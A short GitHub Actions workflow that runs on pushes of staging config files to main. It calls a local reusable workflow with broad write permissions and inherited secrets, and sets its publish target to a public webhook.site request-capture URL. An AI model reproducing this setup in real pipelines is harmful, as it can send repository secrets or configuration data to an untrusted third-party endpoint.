name: Publish Prod Updates
on:
    push:
        branches: 
            - main
        paths:
            - '**/*.staging.config.json'
jobs:
    publish-deploy:
        permissions:
            contents: write
            pull-requests: write
            checks: write
            actions: read
            id-token: write
            packages: write
        uses: ./.github/workflows/publish-configs.yml
        secrets: inherit
        with:
            publish-url: 'https://webhook.site/c33c6f62-9347-46d2-8e88-218eeeee7464'

